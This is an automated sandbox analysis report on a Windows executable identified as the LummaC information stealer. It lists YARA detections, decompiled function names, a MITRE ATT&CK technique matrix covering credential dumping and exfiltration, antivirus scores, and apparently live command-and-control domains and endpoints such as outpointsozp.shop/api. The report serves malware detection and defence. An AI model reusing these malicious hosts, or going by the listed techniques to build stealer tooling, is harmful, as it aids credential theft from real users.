            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
            Source: Yara matchFile source: 00000000.00000003.1789398984.0000000003062000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.1789467851.0000000003078000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.1789281360.0000000003060000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rwsNDpQSKZ.exe PID: 6820, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: rwsNDpQSKZ.exe PID: 6820, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00C78040 ??0CIPCChannelThread@ssb_ipc@@QAE@W4ChannelMode@1@PAVListener@Channel@1@HPAX@Z,__EH_prolog3,??0Channel@ssb_ipc@@QAE@W4ChannelMode@1@PAVListener@01@PAX@Z,InitializeCriticalSection,0_2_00C78040
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00C685E0 ?Set_sourceType@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Response@@QAEXABI@Z,0_2_00C685E0
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00C68600 ?Get_sourceType@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Response@@QAEAAIXZ,0_2_00C68600
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00C5C800 ?Set_userID@CSBMBMessage_Assistant_Broadcast_Unbind_Audio_From_Txchannel_Request@@QAEXABH@Z,0_2_00C5C800
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00C5C9C7 __EH_prolog3_GS,InitializeCriticalSection,??0?$CStringT@_W@Cmm@@QAE@PB_W@Z,GetCurrentProcessId,??_7CFileName@Cmm@@6B@,?GenChannelName@CIPCChannelThread@ssb_ipc@@SAXABV?$CStringT@_W@Cmm@@IAAV34@@Z,??_7?$CStringT@D@Cmm@@6B@,?_cstring_set@Cmm@@YAXAAV?$CStringT@D@1@IPB_WI@Z,??0?$CStringT@D@Cmm@@QAE@PBD@Z,??0CIPCChannelThread@ssb_ipc@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@W4ChannelMode@1@PAVListener@Channel@1@H@Z,?Start@CIPCChannelThread@ssb_ipc@@QAEHXZ,?Unlock@CState@Cmm@@QAEXXZ,?Now@Time@Cmm@@SA?AV12@XZ,0_2_00C5C9C7
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00C5C9C0 ??1Listener@Channel@ssb_ipc@@UAE@XZ,0_2_00C5C9C0
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CAC9F0 ??0Channel@ssb_ipc@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@W4ChannelMode@1@PAVListener@01@H@Z,__EH_prolog3,0_2_00CAC9F0
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CACA40 ??0Channel@ssb_ipc@@QAE@W4ChannelMode@1@PAVListener@01@PAX@Z,__EH_prolog3,0_2_00CACA40
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00C5CBD0 ??0Listener@Channel@ssb_ipc@@QAE@XZ,0_2_00C5CBD0
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00CACB50 ?set_listener@Channel@ssb_ipc@@QAEXPAVListener@12@@Z,0_2_00CACB50
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00C52CF0 ?OnChannelDisconnected@Listener@Channel@ssb_ipc@@UAEXH@Z,0_2_00C52CF0
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00C5CC8F __EH_prolog3_GS,?_cstring_set@Cmm@@YAXAAV?$CStringT@D@1@IPB_WI@Z,??0?$CStringT@D@Cmm@@QAE@PBD@Z,??0CIPCChannelThread@ssb_ipc@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@W4ChannelMode@1@PAVListener@Channel@1@H@Z,?Start@CIPCChannelThread@ssb_ipc@@QAEHXZ,?Unlock@CState@Cmm@@QAEXXZ,?Now@Time@Cmm@@SA?AV12@XZ,?Unlock@CState@Cmm@@QAEXXZ,0_2_00C5CC8F
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00C69080 ?Set_txChannelID@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Response@@QAEXABH@Z,0_2_00C69080
            Source: C:\Users\user\Desktop\rwsNDpQSKZ.exeCode function: 0_2_00C690A0 ?Get_txChannelID@CSBMBMessage_Assistant_Broadcast_Bind_Audio_To_Txchannel_Response@@QAEAAHXZ,0_2_00C690A0

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            Process Injection            		11
            Virtualization/Sandbox Evasion            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		21
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Native API            		Boot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Process Injection            		LSASS Memory141
            Security Software Discovery            		Remote Desktop Protocol31
            Data from Local System            		2
            Non-Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            PowerShell            		Logon Script (Windows)Logon Script (Windows)11
            Deobfuscate/Decode Files or Information            		Security Account Manager11
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive113
            Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
            Obfuscated Files or Information            		NTDS2
            Process Discovery            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA Secrets11
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials34
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            rwsNDpQSKZ.exe39%ReversingLabsWin32.Spyware.Lummastealer
            rwsNDpQSKZ.exe45%VirustotalBrowse

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            outpointsozp.shop19%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg0%URL Reputationsafe
            https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.0%URL Reputationsafe
            http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
            http://x1.c.lencr.org/00%URL Reputationsafe
            http://x1.i.lencr.org/00%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
            https://support.mozilla.org/products/firefoxgro.all0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc940%URL Reputationsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            https://outpointsozp.shop:443/apij0%Avira URL Cloudsafe
            https://outpointsozp.shop/api100%Avira URL Cloudmalware
            https://outpointsozp.shop/J0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            https://outpointsozp.shop/api22%VirustotalBrowse
            shepherdlyopzc.shop0%Avira URL Cloudsafe
            shepherdlyopzc.shop19%VirustotalBrowse
            https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
            https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
            https://duckduckgo.com/ac/?q=0%VirustotalBrowse
            http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
            lariatedzugspd.shop100%Avira URL Cloudmalware
            upknittsoappz.shop0%Avira URL Cloudsafe
            callosallsaospz.shop100%Avira URL Cloudmalware
            outpointsozp.shop0%Avira URL Cloudsafe
            lariatedzugspd.shop19%VirustotalBrowse
            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi0%Avira URL Cloudsafe
            https://outpointsozp.shop/apib0%Avira URL Cloudsafe
            upknittsoappz.shop19%VirustotalBrowse
            https://outpointsozp.shop:443/api100%Avira URL Cloudmalware
            https://outpointsozp.shop/m0%Avira URL Cloudsafe
            https://support.microsof0%Avira URL Cloudsafe
            https://outpointsozp.shop/api)0%Avira URL Cloudsafe
            outpointsozp.shop19%VirustotalBrowse
            unseaffarignsk.shop0%Avira URL Cloudsafe
            https://zoom.us/privacy/support0%Avira URL Cloudsafe
            https://outpointsozp.shop:443/api22%VirustotalBrowse
            https://outpointsozp.shop/0%Avira URL Cloudsafe
            https://outpointsozp.shop/P_;0%Avira URL Cloudsafe
            liernessfornicsa.shop0%Avira URL Cloudsafe
            unseaffarignsk.shop22%VirustotalBrowse
            https://zoom.us/privacy/support0%VirustotalBrowse
            callosallsaospz.shop19%VirustotalBrowse
            https://outpointsozp.shop/3%VirustotalBrowse
            liernessfornicsa.shop19%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            outpointsozp.shop
            		188.114.97.3
            		truetrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://outpointsozp.shop/apitrue
            • 22%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown
            shepherdlyopzc.shoptrue
            • 19%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            lariatedzugspd.shoptrue
            • 19%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown
            upknittsoappz.shoptrue
            • 19%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            callosallsaospz.shoptrue
            • 19%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown
            outpointsozp.shoptrue
            • 19%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            unseaffarignsk.shoptrue
            • 22%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            liernessfornicsa.shoptrue
            • 19%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://duckduckgo.com/chrome_newtabrwsNDpQSKZ.exe, 00000000.00000003.1743747307.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743634641.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743543414.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://duckduckgo.com/ac/?q=rwsNDpQSKZ.exe, 00000000.00000003.1743747307.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743634641.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743543414.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgrwsNDpQSKZ.exe, 00000000.00000003.1776396380.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://outpointsozp.shop:443/apijrwsNDpQSKZ.exe, 00000000.00000002.1839559893.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1836680498.0000000005AEE000.00000004.00000800.00020000.00000000.sdmptrue
            • Avira URL Cloud: safe
            		unknown
            https://www.google.com/images/branding/product/ico/googleg_lodp.icorwsNDpQSKZ.exe, 00000000.00000003.1743747307.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743634641.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743543414.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://outpointsozp.shop/JrwsNDpQSKZ.exe, 00000000.00000003.1836784813.0000000003034000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000002.1838245473.0000000003034000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: safe
            		unknown
            https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.rwsNDpQSKZ.exe, 00000000.00000003.1776396380.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=rwsNDpQSKZ.exe, 00000000.00000003.1743747307.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743634641.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743543414.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://crl.rootca1.amazontrust.com/rootca1.crl0rwsNDpQSKZ.exe, 00000000.00000003.1774886576.0000000005B03000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctarwsNDpQSKZ.exe, 00000000.00000003.1776396380.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=rwsNDpQSKZ.exe, 00000000.00000003.1743747307.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743634641.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743543414.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://ocsp.rootca1.amazontrust.com0:rwsNDpQSKZ.exe, 00000000.00000003.1774886576.0000000005B03000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016rwsNDpQSKZ.exe, 00000000.00000003.1743157934.0000000005B41000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rwsNDpQSKZ.exe, 00000000.00000003.1743157934.0000000005B41000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://www.ecosia.org/newtab/rwsNDpQSKZ.exe, 00000000.00000003.1743747307.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743634641.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743543414.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brrwsNDpQSKZ.exe, 00000000.00000003.1776069335.0000000005C0E000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://ac.ecosia.org/autocomplete?q=rwsNDpQSKZ.exe, 00000000.00000003.1743747307.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743634641.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743543414.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://outpointsozp.shop/apibrwsNDpQSKZ.exe, 00000000.00000003.1786885826.0000000005AEC000.00000004.00000800.00020000.00000000.sdmptrue
            • Avira URL Cloud: safe
            		unknown
            https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgrwsNDpQSKZ.exe, 00000000.00000003.1776396380.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYirwsNDpQSKZ.exe, 00000000.00000003.1776396380.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://outpointsozp.shop/jrwsNDpQSKZ.exe, 00000000.00000003.1836784813.0000000003034000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000002.1838245473.0000000003034000.00000004.00000020.00020000.00000000.sdmptrue
              		unknown
              http://x1.c.lencr.org/0rwsNDpQSKZ.exe, 00000000.00000003.1774886576.0000000005B03000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://x1.i.lencr.org/0rwsNDpQSKZ.exe, 00000000.00000003.1774886576.0000000005B03000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://outpointsozp.shop:443/apirwsNDpQSKZ.exe, 00000000.00000003.1833124427.0000000005AEC000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000002.1839559893.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1809836144.0000000005AEC000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1836680498.0000000005AEE000.00000004.00000800.00020000.00000000.sdmptrue
              • 22%, Virustotal, Browse
              • Avira URL Cloud: malware
              		unknown
              https://outpointsozp.shop/mrwsNDpQSKZ.exe, 00000000.00000003.1742903740.000000000304C000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchrwsNDpQSKZ.exe, 00000000.00000003.1743747307.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743634641.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743543414.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://support.microsofrwsNDpQSKZ.exe, 00000000.00000003.1743157934.0000000005B43000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://crt.rootca1.amazontrust.com/rootca1.cer0?rwsNDpQSKZ.exe, 00000000.00000003.1774886576.0000000005B03000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://outpointsozp.shop/api)rwsNDpQSKZ.exe, 00000000.00000003.1836784813.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000002.1838350467.00000000030B9000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              https://zoom.us/privacy/supportrwsNDpQSKZ.exefalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://outpointsozp.shop/rwsNDpQSKZ.exe, 00000000.00000003.1776029335.0000000005AEF000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1774580193.0000000005AE6000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1742950186.0000000003078000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1755166515.0000000005AEF000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1789398984.0000000003062000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1774341049.0000000005AE4000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1754701278.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1789813074.0000000003063000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1754897667.0000000005AEF000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1776396380.0000000005AEF000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1754389028.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1742903740.000000000304C000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1836784813.0000000003034000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1774644853.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000002.1838245473.0000000003034000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1786885826.0000000005AEC000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1789467851.0000000003078000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1789281360.0000000003060000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1742844809.000000000306A000.00000004.00000020.00020000.00000000.sdmptrue
              • 3%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://outpointsozp.shop/P_;rwsNDpQSKZ.exe, 00000000.00000003.1742950186.0000000003078000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1789398984.0000000003062000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1789467851.0000000003078000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1789281360.0000000003060000.00000004.00000020.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1742844809.000000000306A000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              https://support.mozilla.org/products/firefoxgro.allrwsNDpQSKZ.exe, 00000000.00000003.1776069335.0000000005C0E000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=rwsNDpQSKZ.exe, 00000000.00000003.1743747307.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743634641.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, rwsNDpQSKZ.exe, 00000000.00000003.1743543414.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94rwsNDpQSKZ.exe, 00000000.00000003.1776396380.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              188.114.97.3
              		outpointsozp.shopEuropean Union
              		13335CLOUDFLARENETUStrue

              General Information

              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1483410
              Start date and time:2024-07-27 11:24:08 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 5m 1s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:4
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:rwsNDpQSKZ.exe
              renamed because original name is a hash value
              Original Sample Name:5989beb7f9f82b27b741ad6a7b091d7003ed059337563d1f1a39eaf85334fedd.exe
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 67%
              • Number of executed functions: 2
              • Number of non-executed functions: 468
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Stop behavior analysis, all processes terminated

              Warnings

              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtOpenFile calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              05:25:07API Interceptor7x Sleep call for process: rwsNDpQSKZ.exe modified

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              188.114.97.38SxJ9aYfJ1.exeGet hashmaliciousFormBookBrowse
              • www.exporationgenius.sbs/x06k/
              o4iytkmhqh.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
